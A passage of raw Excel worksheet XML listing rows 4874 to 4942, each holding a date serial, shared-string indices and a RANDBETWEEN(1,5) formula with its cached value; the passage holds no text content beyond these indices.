    <row r="4874" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4874" s="1">
        <v>43468.07707175926</v>
      </c>
      <c r="B4874" t="s">
        <v>35</v>
      </c>
      <c r="C4874" t="s">
        <v>477</v>
      </c>
      <c r="E4874" s="2" t="s">
        <v>4629</v>
      </c>
      <c r="F4874">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4875" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4875" s="1">
        <v>43468.032951388886</v>
      </c>
      <c r="B4875" t="s">
        <v>1305</v>
      </c>
      <c r="C4875" t="s">
        <v>41</v>
      </c>
      <c r="E4875" s="2" t="s">
        <v>4630</v>
      </c>
      <c r="F4875">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4876" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4876" s="1">
        <v>43468.015046296299</v>
      </c>
      <c r="B4876" t="s">
        <v>5</v>
      </c>
      <c r="C4876" t="s">
        <v>41</v>
      </c>
      <c r="E4876" t="s">
        <v>4631</v>
      </c>
      <c r="F4876">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4877" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4877" s="1">
        <v>43468.012557870374</v>
      </c>
      <c r="B4877" t="s">
        <v>13</v>
      </c>
      <c r="C4877" t="s">
        <v>197</v>
      </c>
      <c r="E4877" s="2" t="s">
        <v>4632</v>
      </c>
      <c r="F4877">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4878" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4878" s="1">
        <v>43467.92291666667</v>
      </c>
      <c r="B4878" t="s">
        <v>13</v>
      </c>
      <c r="C4878" t="s">
        <v>73</v>
      </c>
      <c r="E4878" s="2" t="s">
        <v>4633</v>
      </c>
      <c r="F4878">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4879" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4879" s="1">
        <v>43467.824201388888</v>
      </c>
      <c r="B4879" t="s">
        <v>13</v>
      </c>
      <c r="C4879" t="s">
        <v>10</v>
      </c>
      <c r="D4879" t="s">
        <v>6</v>
      </c>
      <c r="E4879" t="s">
        <v>4634</v>
      </c>
      <c r="F4879">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4880" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4880" s="1">
        <v>43467.798379629632</v>
      </c>
      <c r="C4880" t="s">
        <v>140</v>
      </c>
      <c r="D4880" t="s">
        <v>197</v>
      </c>
      <c r="E4880" t="s">
        <v>4635</v>
      </c>
      <c r="F4880">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4881" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4881" s="1">
        <v>43467.784930555557</v>
      </c>
      <c r="B4881" t="s">
        <v>19</v>
      </c>
      <c r="C4881" t="s">
        <v>10</v>
      </c>
      <c r="D4881" t="s">
        <v>6</v>
      </c>
      <c r="E4881" s="2" t="s">
        <v>4636</v>
      </c>
      <c r="F4881">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4882" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4882" s="1">
        <v>43467.708298611113</v>
      </c>
      <c r="B4882" t="s">
        <v>35</v>
      </c>
      <c r="C4882" t="s">
        <v>10</v>
      </c>
      <c r="D4882" t="s">
        <v>89</v>
      </c>
      <c r="E4882" t="s">
        <v>4637</v>
      </c>
      <c r="F4882">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4883" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4883" s="1">
        <v>43467.707546296297</v>
      </c>
      <c r="B4883" t="s">
        <v>19</v>
      </c>
      <c r="C4883" t="s">
        <v>10</v>
      </c>
      <c r="D4883" t="s">
        <v>163</v>
      </c>
      <c r="E4883" t="s">
        <v>4638</v>
      </c>
      <c r="F4883">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4884" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4884" s="1">
        <v>43467.701539351852</v>
      </c>
      <c r="B4884" t="s">
        <v>13</v>
      </c>
      <c r="C4884" t="s">
        <v>10</v>
      </c>
      <c r="D4884" t="s">
        <v>52</v>
      </c>
      <c r="E4884" t="s">
        <v>4639</v>
      </c>
      <c r="F4884">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4885" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A4885" s="1">
        <v>43467.698368055557</v>
      </c>
      <c r="B4885" t="s">
        <v>19</v>
      </c>
      <c r="C4885" t="s">
        <v>6</v>
      </c>
      <c r="D4885" t="s">
        <v>25</v>
      </c>
      <c r="E4885" s="2" t="s">
        <v>4640</v>
      </c>
      <c r="F4885">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4886" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4886" s="1">
        <v>43467.692673611113</v>
      </c>
      <c r="B4886" t="s">
        <v>13</v>
      </c>
      <c r="C4886" t="s">
        <v>10</v>
      </c>
      <c r="D4886" t="s">
        <v>178</v>
      </c>
      <c r="E4886" s="2" t="s">
        <v>4641</v>
      </c>
      <c r="F4886">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4887" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4887" s="1">
        <v>43467.685833333337</v>
      </c>
      <c r="B4887" t="s">
        <v>13</v>
      </c>
      <c r="C4887" t="s">
        <v>6</v>
      </c>
      <c r="D4887" t="s">
        <v>821</v>
      </c>
      <c r="E4887" t="s">
        <v>4642</v>
      </c>
      <c r="F4887">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4888" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A4888" s="1">
        <v>43467.6794212963</v>
      </c>
      <c r="B4888" t="s">
        <v>13</v>
      </c>
      <c r="C4888" t="s">
        <v>10</v>
      </c>
      <c r="D4888" t="s">
        <v>89</v>
      </c>
      <c r="E4888" s="2" t="s">
        <v>4643</v>
      </c>
      <c r="F4888">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4889" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4889" s="1">
        <v>43467.660185185188</v>
      </c>
      <c r="B4889" t="s">
        <v>13</v>
      </c>
      <c r="C4889" t="s">
        <v>10</v>
      </c>
      <c r="D4889" t="s">
        <v>1056</v>
      </c>
      <c r="E4889" t="s">
        <v>4644</v>
      </c>
      <c r="F4889">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4890" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4890" s="1">
        <v>43467.640335648146</v>
      </c>
      <c r="B4890" t="s">
        <v>35</v>
      </c>
      <c r="C4890" t="s">
        <v>10</v>
      </c>
      <c r="E4890" t="s">
        <v>4645</v>
      </c>
      <c r="F4890">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4891" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4891" s="1">
        <v>43467.631458333337</v>
      </c>
      <c r="B4891" t="s">
        <v>5</v>
      </c>
      <c r="C4891" t="s">
        <v>10</v>
      </c>
      <c r="D4891" t="s">
        <v>23</v>
      </c>
      <c r="E4891" t="s">
        <v>4646</v>
      </c>
      <c r="F4891">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4892" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4892" s="1">
        <v>43467.628159722219</v>
      </c>
      <c r="C4892" t="s">
        <v>60</v>
      </c>
      <c r="F4892">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4893" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4893" s="1">
        <v>43467.622199074074</v>
      </c>
      <c r="B4893" t="s">
        <v>19</v>
      </c>
      <c r="C4893" t="s">
        <v>6</v>
      </c>
      <c r="D4893" t="s">
        <v>25</v>
      </c>
      <c r="E4893" t="s">
        <v>4647</v>
      </c>
      <c r="F4893">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4894" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4894" s="1">
        <v>43467.617094907408</v>
      </c>
      <c r="B4894" t="s">
        <v>5</v>
      </c>
      <c r="C4894" t="s">
        <v>10</v>
      </c>
      <c r="D4894" t="s">
        <v>41</v>
      </c>
      <c r="E4894" s="2" t="s">
        <v>4648</v>
      </c>
      <c r="F4894">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4895" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A4895" s="1">
        <v>43467.614085648151</v>
      </c>
      <c r="B4895" t="s">
        <v>19</v>
      </c>
      <c r="C4895" t="s">
        <v>10</v>
      </c>
      <c r="D4895" t="s">
        <v>263</v>
      </c>
      <c r="E4895" s="2" t="s">
        <v>4649</v>
      </c>
      <c r="F4895">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4896" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4896" s="1">
        <v>43467.60659722222</v>
      </c>
      <c r="B4896" t="s">
        <v>5</v>
      </c>
      <c r="C4896" t="s">
        <v>10</v>
      </c>
      <c r="D4896" t="s">
        <v>6</v>
      </c>
      <c r="E4896" t="s">
        <v>4650</v>
      </c>
      <c r="F4896">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4897" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4897" s="1">
        <v>43467.606215277781</v>
      </c>
      <c r="B4897" t="s">
        <v>5</v>
      </c>
      <c r="C4897" t="s">
        <v>10</v>
      </c>
      <c r="D4897" t="s">
        <v>6</v>
      </c>
      <c r="E4897" t="s">
        <v>4650</v>
      </c>
      <c r="F4897">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4898" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4898" s="1">
        <v>43467.59646990741</v>
      </c>
      <c r="B4898" t="s">
        <v>13</v>
      </c>
      <c r="C4898" t="s">
        <v>10</v>
      </c>
      <c r="D4898" t="s">
        <v>6</v>
      </c>
      <c r="E4898" s="2" t="s">
        <v>4651</v>
      </c>
      <c r="F4898">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4899" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4899" s="1">
        <v>43467.591180555559</v>
      </c>
      <c r="B4899" t="s">
        <v>13</v>
      </c>
      <c r="C4899" t="s">
        <v>2210</v>
      </c>
      <c r="E4899" s="2" t="s">
        <v>4652</v>
      </c>
      <c r="F4899">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4900" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4900" s="1">
        <v>43467.581250000003</v>
      </c>
      <c r="B4900" t="s">
        <v>5</v>
      </c>
      <c r="C4900" t="s">
        <v>10</v>
      </c>
      <c r="D4900" t="s">
        <v>20</v>
      </c>
      <c r="E4900" s="2" t="s">
        <v>4653</v>
      </c>
      <c r="F4900">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4901" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4901" s="1">
        <v>43467.560162037036</v>
      </c>
      <c r="B4901" t="s">
        <v>5</v>
      </c>
      <c r="C4901" t="s">
        <v>41</v>
      </c>
      <c r="E4901" t="s">
        <v>4654</v>
      </c>
      <c r="F4901">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4902" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4902" s="1">
        <v>43467.556689814817</v>
      </c>
      <c r="B4902" t="s">
        <v>13</v>
      </c>
      <c r="C4902" t="s">
        <v>10</v>
      </c>
      <c r="D4902" t="s">
        <v>112</v>
      </c>
      <c r="E4902" t="s">
        <v>4655</v>
      </c>
      <c r="F4902">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4903" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4903" s="1">
        <v>43467.553715277776</v>
      </c>
      <c r="B4903" t="s">
        <v>5</v>
      </c>
      <c r="C4903" t="s">
        <v>10</v>
      </c>
      <c r="D4903" t="s">
        <v>6</v>
      </c>
      <c r="E4903" s="2" t="s">
        <v>4656</v>
      </c>
      <c r="F4903">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4904" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4904" s="1">
        <v>43467.544270833336</v>
      </c>
      <c r="B4904" t="s">
        <v>1305</v>
      </c>
      <c r="C4904" t="s">
        <v>3049</v>
      </c>
      <c r="E4904" t="s">
        <v>4657</v>
      </c>
      <c r="F4904">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4905" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4905" s="1">
        <v>43467.54111111111</v>
      </c>
      <c r="B4905" t="s">
        <v>5</v>
      </c>
      <c r="C4905" t="s">
        <v>10</v>
      </c>
      <c r="D4905" t="s">
        <v>80</v>
      </c>
      <c r="E4905" t="s">
        <v>4658</v>
      </c>
      <c r="F4905">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4906" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4906" s="1">
        <v>43467.534189814818</v>
      </c>
      <c r="B4906" t="s">
        <v>19</v>
      </c>
      <c r="C4906" t="s">
        <v>6</v>
      </c>
      <c r="D4906" t="s">
        <v>7</v>
      </c>
      <c r="E4906" s="2" t="s">
        <v>4659</v>
      </c>
      <c r="F4906">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4907" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4907" s="1">
        <v>43467.525439814817</v>
      </c>
      <c r="B4907" t="s">
        <v>13</v>
      </c>
      <c r="C4907" t="s">
        <v>10</v>
      </c>
      <c r="D4907" t="s">
        <v>80</v>
      </c>
      <c r="E4907" s="2" t="s">
        <v>4660</v>
      </c>
      <c r="F4907">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4908" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4908" s="1">
        <v>43467.517071759263</v>
      </c>
      <c r="B4908" t="s">
        <v>19</v>
      </c>
      <c r="C4908" t="s">
        <v>6</v>
      </c>
      <c r="D4908" t="s">
        <v>194</v>
      </c>
      <c r="E4908" t="s">
        <v>4661</v>
      </c>
      <c r="F4908">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4909" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4909" s="1">
        <v>43467.511967592596</v>
      </c>
      <c r="B4909" t="s">
        <v>1305</v>
      </c>
      <c r="C4909" t="s">
        <v>173</v>
      </c>
      <c r="E4909" s="2" t="s">
        <v>4662</v>
      </c>
      <c r="F4909">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4910" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4910" s="1">
        <v>43467.499456018515</v>
      </c>
      <c r="B4910" t="s">
        <v>5</v>
      </c>
      <c r="C4910" t="s">
        <v>10</v>
      </c>
      <c r="D4910" t="s">
        <v>36</v>
      </c>
      <c r="E4910" t="s">
        <v>4663</v>
      </c>
      <c r="F4910">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4911" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4911" s="1">
        <v>43467.496793981481</v>
      </c>
      <c r="B4911" t="s">
        <v>5</v>
      </c>
      <c r="C4911" t="s">
        <v>410</v>
      </c>
      <c r="E4911" s="2" t="s">
        <v>4664</v>
      </c>
      <c r="F4911">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4912" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4912" s="1">
        <v>43467.491956018515</v>
      </c>
      <c r="B4912" t="s">
        <v>19</v>
      </c>
      <c r="C4912" t="s">
        <v>10</v>
      </c>
      <c r="D4912" t="s">
        <v>271</v>
      </c>
      <c r="E4912" t="s">
        <v>4665</v>
      </c>
      <c r="F4912">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4913" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4913" s="1">
        <v>43467.476215277777</v>
      </c>
      <c r="B4913" t="s">
        <v>5</v>
      </c>
      <c r="C4913" t="s">
        <v>41</v>
      </c>
      <c r="E4913" s="2" t="s">
        <v>4666</v>
      </c>
      <c r="F4913">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4914" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4914" s="1">
        <v>43467.436076388891</v>
      </c>
      <c r="B4914" t="s">
        <v>13</v>
      </c>
      <c r="C4914" t="s">
        <v>10</v>
      </c>
      <c r="D4914" t="s">
        <v>80</v>
      </c>
      <c r="E4914" t="s">
        <v>4667</v>
      </c>
      <c r="F4914">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4915" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A4915" s="1">
        <v>43467.429837962962</v>
      </c>
      <c r="B4915" t="s">
        <v>5</v>
      </c>
      <c r="C4915" t="s">
        <v>907</v>
      </c>
      <c r="E4915" s="2" t="s">
        <v>4668</v>
      </c>
      <c r="F4915">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4916" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4916" s="1">
        <v>43467.413310185184</v>
      </c>
      <c r="B4916" t="s">
        <v>19</v>
      </c>
      <c r="C4916" t="s">
        <v>48</v>
      </c>
      <c r="E4916" t="s">
        <v>4669</v>
      </c>
      <c r="F4916">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4917" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4917" s="1">
        <v>43467.397129629629</v>
      </c>
      <c r="B4917" t="s">
        <v>19</v>
      </c>
      <c r="C4917" t="s">
        <v>10</v>
      </c>
      <c r="D4917" t="s">
        <v>86</v>
      </c>
      <c r="E4917" t="s">
        <v>4670</v>
      </c>
      <c r="F4917">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4918" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A4918" s="1">
        <v>43467.383680555555</v>
      </c>
      <c r="B4918" t="s">
        <v>5</v>
      </c>
      <c r="C4918" t="s">
        <v>10</v>
      </c>
      <c r="D4918" t="s">
        <v>33</v>
      </c>
      <c r="E4918" s="2" t="s">
        <v>4671</v>
      </c>
      <c r="F4918">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4919" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4919" s="1">
        <v>43467.380555555559</v>
      </c>
      <c r="B4919" t="s">
        <v>5</v>
      </c>
      <c r="C4919" t="s">
        <v>10</v>
      </c>
      <c r="D4919" t="s">
        <v>158</v>
      </c>
      <c r="E4919" t="s">
        <v>4672</v>
      </c>
      <c r="F4919">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4920" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4920" s="1">
        <v>43467.380474537036</v>
      </c>
      <c r="B4920" t="s">
        <v>5</v>
      </c>
      <c r="C4920" t="s">
        <v>10</v>
      </c>
      <c r="D4920" t="s">
        <v>158</v>
      </c>
      <c r="E4920" t="s">
        <v>4672</v>
      </c>
      <c r="F4920">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4921" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4921" s="1">
        <v>43467.376793981479</v>
      </c>
      <c r="B4921" t="s">
        <v>5</v>
      </c>
      <c r="C4921" t="s">
        <v>10</v>
      </c>
      <c r="D4921" t="s">
        <v>178</v>
      </c>
      <c r="E4921" t="s">
        <v>4674</v>
      </c>
      <c r="F4921">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4922" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4922" s="1">
        <v>43467.37358796296</v>
      </c>
      <c r="B4922" t="s">
        <v>13</v>
      </c>
      <c r="C4922" t="s">
        <v>10</v>
      </c>
      <c r="D4922" t="s">
        <v>36</v>
      </c>
      <c r="E4922" s="2" t="s">
        <v>4675</v>
      </c>
      <c r="F4922">
        <f t="shared" ca="1" si="76"/>
        <v>4</v>
      </c>
    </row>
    <row r="4923" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4923" s="1">
        <v>43467.362164351849</v>
      </c>
      <c r="B4923" t="s">
        <v>19</v>
      </c>
      <c r="C4923" t="s">
        <v>124</v>
      </c>
      <c r="E4923" t="s">
        <v>4676</v>
      </c>
      <c r="F4923">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4924" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4924" s="1">
        <v>43467.346631944441</v>
      </c>
      <c r="B4924" t="s">
        <v>1305</v>
      </c>
      <c r="C4924" t="s">
        <v>10</v>
      </c>
      <c r="D4924" t="s">
        <v>80</v>
      </c>
      <c r="E4924" t="s">
        <v>4677</v>
      </c>
      <c r="F4924">
        <f t="shared" ca="1" si="76"/>
        <v>1</v>
      </c>
    </row>
    <row r="4925" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4925" s="1">
        <v>43467.316712962966</v>
      </c>
      <c r="B4925" t="s">
        <v>5</v>
      </c>
      <c r="C4925" t="s">
        <v>41</v>
      </c>
      <c r="F4925">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4926" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4926" s="1">
        <v>43467.303715277776</v>
      </c>
      <c r="B4926" t="s">
        <v>13</v>
      </c>
      <c r="C4926" t="s">
        <v>41</v>
      </c>
      <c r="E4926" s="2" t="s">
        <v>4678</v>
      </c>
      <c r="F4926">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4927" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4927" s="1">
        <v>43467.297326388885</v>
      </c>
      <c r="B4927" t="s">
        <v>5</v>
      </c>
      <c r="C4927" t="s">
        <v>318</v>
      </c>
      <c r="E4927" s="2" t="s">
        <v>4679</v>
      </c>
      <c r="F4927">
        <f t="shared" ca="1" si="76"/>
        <v>3</v>
      </c>
    </row>
    <row r="4928" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A4928" s="1">
        <v>43467.285682870373</v>
      </c>
      <c r="B4928" t="s">
        <v>19</v>
      </c>
      <c r="C4928" t="s">
        <v>471</v>
      </c>
      <c r="E4928" s="2" t="s">
        <v>4680</v>
      </c>
      <c r="F4928">
        <f t="shared" ca="1" si="76"/>
        <v>5</v>
      </c>
    </row>
    <row r="4929" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4929" s="1">
        <v>43467.257060185184</v>
      </c>
      <c r="B4929" t="s">
        <v>13</v>
      </c>
      <c r="C4929" t="s">
        <v>41</v>
      </c>
      <c r="E4929" s="2" t="s">
        <v>4681</v>
      </c>
      <c r="F4929">
        <f t="shared" ca="1" si="76"/>
        <v>2</v>
      </c>
    </row>
    <row r="4930" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4930" s="1">
        <v>43467.24726851852</v>
      </c>
      <c r="B4930" t="s">
        <v>19</v>
      </c>
      <c r="C4930" t="s">
        <v>71</v>
      </c>
      <c r="E4930" s="2" t="s">
        <v>4682</v>
      </c>
      <c r="F4930">
        <f t="shared" ref="F4930:F4993" ca="1" si="77">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4931" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4931" s="1">
        <v>43467.199293981481</v>
      </c>
      <c r="B4931" t="s">
        <v>19</v>
      </c>
      <c r="C4931" t="s">
        <v>41</v>
      </c>
      <c r="E4931" t="s">
        <v>4683</v>
      </c>
      <c r="F4931">
        <f t="shared" ca="1" si="77"/>
        <v>1</v>
      </c>
    </row>
    <row r="4932" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4932" s="1">
        <v>43467.193483796298</v>
      </c>
      <c r="B4932" t="s">
        <v>19</v>
      </c>
      <c r="C4932" t="s">
        <v>197</v>
      </c>
      <c r="E4932" t="s">
        <v>4684</v>
      </c>
      <c r="F4932">
        <f t="shared" ca="1" si="77"/>
        <v>5</v>
      </c>
    </row>
    <row r="4933" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4933" s="1">
        <v>43467.179085648146</v>
      </c>
      <c r="B4933" t="s">
        <v>5</v>
      </c>
      <c r="C4933" t="s">
        <v>41</v>
      </c>
      <c r="E4933" t="s">
        <v>4685</v>
      </c>
      <c r="F4933">
        <f t="shared" ca="1" si="77"/>
        <v>4</v>
      </c>
    </row>
    <row r="4934" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4934" s="1">
        <v>43467.179097222222</v>
      </c>
      <c r="B4934" t="s">
        <v>5</v>
      </c>
      <c r="C4934" t="s">
        <v>41</v>
      </c>
      <c r="E4934" t="s">
        <v>4685</v>
      </c>
      <c r="F4934">
        <f t="shared" ca="1" si="77"/>
        <v>5</v>
      </c>
    </row>
    <row r="4935" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4935" s="1">
        <v>43467.095000000001</v>
      </c>
      <c r="B4935" t="s">
        <v>19</v>
      </c>
      <c r="C4935" t="s">
        <v>41</v>
      </c>
      <c r="E4935" t="s">
        <v>4686</v>
      </c>
      <c r="F4935">
        <f t="shared" ca="1" si="77"/>
        <v>3</v>
      </c>
    </row>
    <row r="4936" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4936" s="1">
        <v>43467.075335648151</v>
      </c>
      <c r="B4936" t="s">
        <v>5</v>
      </c>
      <c r="C4936" t="s">
        <v>41</v>
      </c>
      <c r="E4936" s="2" t="s">
        <v>4687</v>
      </c>
      <c r="F4936">
        <f t="shared" ca="1" si="77"/>
        <v>4</v>
      </c>
    </row>
    <row r="4937" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4937" s="1">
        <v>43467.023587962962</v>
      </c>
      <c r="B4937" t="s">
        <v>5</v>
      </c>
      <c r="C4937" t="s">
        <v>73</v>
      </c>
      <c r="E4937" t="s">
        <v>4688</v>
      </c>
      <c r="F4937">
        <f t="shared" ca="1" si="77"/>
        <v>2</v>
      </c>
    </row>
    <row r="4938" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4938" s="1">
        <v>43467.014675925922</v>
      </c>
      <c r="B4938" t="s">
        <v>5</v>
      </c>
      <c r="C4938" t="s">
        <v>140</v>
      </c>
      <c r="D4938" t="s">
        <v>234</v>
      </c>
      <c r="E4938" s="2" t="s">
        <v>4689</v>
      </c>
      <c r="F4938">
        <f t="shared" ca="1" si="77"/>
        <v>1</v>
      </c>
    </row>
    <row r="4939" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4939" s="1">
        <v>43466.982210648152</v>
      </c>
      <c r="B4939" t="s">
        <v>19</v>
      </c>
      <c r="C4939" t="s">
        <v>41</v>
      </c>
      <c r="E4939" t="s">
        <v>4690</v>
      </c>
      <c r="F4939">
        <f t="shared" ca="1" si="77"/>
        <v>1</v>
      </c>
    </row>
    <row r="4940" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4940" s="1">
        <v>43466.932106481479</v>
      </c>
      <c r="B4940" t="s">
        <v>35</v>
      </c>
      <c r="C4940" t="s">
        <v>339</v>
      </c>
      <c r="E4940" s="2" t="s">
        <v>4691</v>
      </c>
      <c r="F4940">
        <f t="shared" ca="1" si="77"/>
        <v>2</v>
      </c>
    </row>
    <row r="4941" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A4941" s="1">
        <v>43466.903564814813</v>
      </c>
      <c r="B4941" t="s">
        <v>19</v>
      </c>
      <c r="C4941" t="s">
        <v>140</v>
      </c>
      <c r="D4941" t="s">
        <v>141</v>
      </c>
      <c r="E4941" s="2" t="s">
        <v>4692</v>
      </c>
      <c r="F4941">
        <f t="shared" ca="1" si="77"/>
        <v>5</v>
      </c>
    </row>
    <row r="4942" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4942" s="1">
        <v>43466.549444444441</v>
      </c>
      <c r="B4942" t="s">
        <v>19</v>
      </c>
      <c r="C4942" t="s">
        <v>10</v>
      </c>
      <c r="D4942" t="s">
        <v>163</v>
      </c>
      <c r="E4942" s="2" t="s">
        <v>4693</v>
      </c>
      <c r="F4942">
        <f t="shared" ca="1" si="77"/>
        <v>3</v>
      </c>
